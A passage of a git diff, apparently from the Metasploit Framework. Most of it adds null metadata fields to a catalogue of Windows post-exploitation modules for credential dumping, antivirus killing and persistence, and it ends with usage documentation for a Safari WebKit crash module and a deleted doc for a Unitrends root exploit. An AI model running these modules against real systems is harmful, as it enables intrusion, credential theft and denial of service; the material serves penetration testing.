"/modules/post/windows/gather/enum_ad_service_principal_names.rb", @@ -119915,6 +149580,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", @@ -119944,6 +149611,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", @@ -119975,6 +149644,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ad_users.rb", @@ -120004,6 +149675,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_applications.rb", @@ -120033,6 +149706,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_artifacts.rb", @@ -120063,6 +149738,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_av_excluded.rb", @@ -120095,6 +149772,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-27 07:41:06 +0000", "path": "/modules/post/windows/gather/enum_chrome.rb", @@ -120124,6 +149803,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_computers.rb", @@ -120154,6 +149835,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_db.rb", @@ -120183,6 +149866,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_devices.rb", @@ -120214,6 +149899,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_dirperms.rb", @@ -120243,6 +149930,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain.rb", @@ -120273,6 +149962,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain_group_users.rb", @@ -120302,6 +149993,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domain_tokens.rb", @@ -120332,6 +150025,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/enum_domain_users.rb", @@ -120361,6 +150056,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_domains.rb", @@ -120390,6 +150087,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_emet.rb", @@ -120420,6 +150119,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_files.rb", @@ -120449,6 +150150,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_hostfile.rb", @@ -120478,6 +150181,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_ie.rb", @@ -120507,6 +150212,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_logged_on_users.rb", @@ -120536,6 +150243,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-24 16:06:55 +0000", "path": "/modules/post/windows/gather/enum_ms_product_keys.rb", @@ -120565,6 +150274,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_muicache.rb", @@ -120595,6 +150306,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_patches.rb", @@ -120624,6 +150337,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_powershell_env.rb", @@ -120653,6 +150368,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_prefetch.rb", @@ -120682,6 +150399,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_proxy.rb", @@ -120711,6 +150430,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", @@ -120741,6 +150462,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_services.rb", @@ -120770,6 +150493,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_shares.rb", @@ -120800,6 +150525,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_snmp.rb", @@ -120829,6 +150556,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_termserv.rb", @@ -120858,6 +150587,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_tokens.rb", @@ -120887,6 +150618,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_tomcat.rb", @@ -120916,6 +150649,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_trusted_locations.rb", @@ -120949,6 +150684,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/enum_unattend.rb", @@ -120978,6 +150715,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", @@ -121007,6 +150746,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/browser_history.rb", @@ -121037,6 +150778,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/duqu_check.rb", @@ -121066,6 +150809,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/enum_drives.rb", @@ -121095,6 +150840,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/imager.rb", @@ -121124,6 +150871,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/nbd_server.rb", @@ -121153,6 +150902,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/forensics/recovery_files.rb", @@ -121182,6 +150933,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/hashdump.rb", @@ -121213,6 +150966,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/local_admin_search_enum.rb", @@ -121242,6 +150997,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/lsa_secrets.rb", @@ -121271,6 +151028,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/make_csv_orgchart.rb", @@ -121300,6 +151059,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/gather/memory_grep.rb", @@ -121330,6 +151091,8 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/netlm_downgrade.rb", @@ -121359,6 +151122,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-26 08:22:11 +0000", "path": "/modules/post/windows/gather/ntds_grabber.rb", @@ -121388,6 +151153,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/ntds_location.rb", @@ -121417,6 +151184,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/outlook.rb", @@ -121447,6 +151216,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/phish_windows_credentials.rb", @@ -121476,6 +151247,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/resolve_sid.rb", @@ -121505,6 +151278,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/reverse_lookup.rb", @@ -121537,6 +151312,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/windows/gather/screen_spy.rb", @@ -121566,6 +151343,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/smart_hashdump.rb", @@ -121595,6 +151374,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/tcpnetstat.rb", @@ -121624,6 +151405,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/usb_history.rb", @@ -121653,6 +151436,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-19 01:35:19 +0000", "path": "/modules/post/windows/gather/win_privs.rb", @@ -121682,6 +151467,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/wmic_command.rb", @@ -121711,6 +151498,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/gather/word_unc_injector.rb", @@ -121740,6 +151529,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/add_user_domain.rb", @@ -121769,6 +151560,8 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/archmigrate.rb", @@ -121798,6 +151591,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/change_password.rb", @@ -121827,6 +151622,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/clone_proxy_settings.rb", @@ -121856,6 +151653,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/delete_user.rb", @@ -121885,6 +151684,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/download_exec.rb", @@ -121914,6 +151715,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/driver_loader.rb", @@ -121943,6 +151746,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-21 22:46:30 +0000", "path": "/modules/post/windows/manage/enable_rdp.rb", @@ -121972,6 +151777,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/enable_support_account.rb", @@ -122002,6 +151809,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/exec_powershell.rb", @@ -122032,6 +151841,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/forward_pageant.rb", @@ -122061,6 +151872,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/hashcarve.rb", @@ -122091,6 +151904,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/ie_proxypac.rb", @@ -122120,6 +151935,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/inject_ca.rb", @@ -122149,6 +151966,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-06-12 17:11:29 +0000", "path": "/modules/post/windows/manage/inject_host.rb", @@ -122181,6 +152000,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/killav.rb", @@ -122210,6 +152031,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/migrate.rb", @@ -122239,6 +152062,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", @@ -122269,6 +152094,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", @@ -122298,6 +152125,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/nbd_server.rb", @@ -122328,6 +152157,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/payload_inject.rb", @@ -122357,6 +152188,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-28 11:33:17 +0000", "path": "/modules/post/windows/manage/peinjector.rb", @@ -122386,6 +152219,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-26 17:46:18 +0000", "path": "/modules/post/windows/manage/persistence_exe.rb", @@ -122415,6 +152250,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/portproxy.rb", @@ -122444,6 +152281,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-27 07:41:06 +0000", "path": "/modules/post/windows/manage/powershell/build_net_code.rb", @@ -122474,6 +152313,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", @@ -122504,6 +152345,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/powershell/load_script.rb", @@ -122533,6 +152376,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/pptp_tunnel.rb", @@ -122563,6 +152408,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/priv_migrate.rb", @@ -122592,6 +152439,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/pxeexploit.rb", @@ -122621,6 +152470,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/reflective_dll_inject.rb", @@ -122650,6 +152501,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/remove_ca.rb", @@ -122679,6 +152532,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/remove_host.rb", @@ -122708,6 +152563,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-03 04:57:41 +0000", "path": "/modules/post/windows/manage/rid_hijack.rb", @@ -122737,6 +152594,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/rpcapd_start.rb", @@ -122766,6 +152625,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-09 15:27:50 +0000", "path": "/modules/post/windows/manage/run_as.rb", @@ -122795,6 +152656,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/run_as_psh.rb", @@ -122824,6 +152687,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/sdel.rb", @@ -122854,6 +152719,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/sticky_keys.rb", @@ -122883,6 +152750,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vmdk_mount.rb", @@ -122912,6 +152781,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_create.rb", @@ -122941,6 +152812,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_list.rb", @@ -122970,6 +152843,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_mount.rb", @@ -122999,6 +152874,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/vss_set_storage.rb", @@ -123028,6 +152905,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/vss_storage.rb", @@ -123057,6 +152936,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/manage/wdigest_caching.rb", @@ -123086,6 +152967,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/manage/webcam.rb", @@ -123115,6 +152998,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/recon/computer_browser_discovery.rb", @@ -123144,6 +153029,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/recon/outbound_ports.rb", @@ -123173,6 +153060,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/recon/resolve_ip.rb", @@ -123202,6 +153091,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_bss_list.rb", @@ -123231,6 +153122,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_current_connection.rb", @@ -123260,6 +153153,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/post/windows/wlan/wlan_disconnect.rb", @@ -123289,6 +153184,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-03 11:41:09 +0000", "path": "/modules/post/windows/wlan/wlan_probe_request.rb", @@ -123318,6 +153215,8 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/post/windows/wlan/wlan_profile.rb", diff --git a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md new file mode 100644 index 0000000000..5dfbac0edc --- /dev/null +++ b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md @@ -0,0 +1,31 @@ +## Vulnerable Application + +This module exploits a vulnerability in Safari WebKit to crash the device. +The bug affects all iOS devices running iOS 9 up to iOS 12 and Safari on OSX 10.13.6 + +The device will "re-spring" the operating system, but not actually restart the device. + +## Verification Steps + +1. Start msfconsole +1. Do: `use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur` +1. Do: `set URIPATH /` (Optional) +1. Do: `run` +1. When you visit the page on a vulnerable device, it should crash the operating system + +## Scenarios + +### Safari 602.1 on iOS 10.1.1 + +``` +msf5 > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur +msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / +URIPATH => / +msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run + +[*] Using URL: http://0.0.0.0:8080/ +[*] Local IP: http://192.168.0.1:8080/ +[*] Server started. +[*] 192.168.0.2: Sending response to User-Agent: Mozilla/5.0 (iPod touch; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B150 Safari/602.1 + +``` diff --git a/documentation/modules/exploit/linux/http/ueb9_api_storage.md b/documentation/modules/exploit/linux/http/ueb9_api_storage.md deleted file mode 100644 index 05abde08c9..0000000000 --- a/documentation/modules/exploit/linux/http/ueb9_api_storage.md +++ /dev/null @@ -1,42 +0,0 @@ -## Vulnerable Application - - Unitrends UEB 9 http api/storage remote root - - This exploit leverages a sqli vulnerability for authentication bypass, - together with command injection for subsequent root RCE. - -## Verification Steps - - 1. ```use exploit/linux/http/ueb9_api_storage ``` - 2. ```set lhost [IP]``` - 3. ```set rhost [IP]``` - 4. ```exploit``` - 5. A meterpreter session should have been opened successfully - -## Scenarios - -### UEB 9.1 on CentOS 6.5 - -``` -msf > use exploit/linux/http/ueb9_api_storage 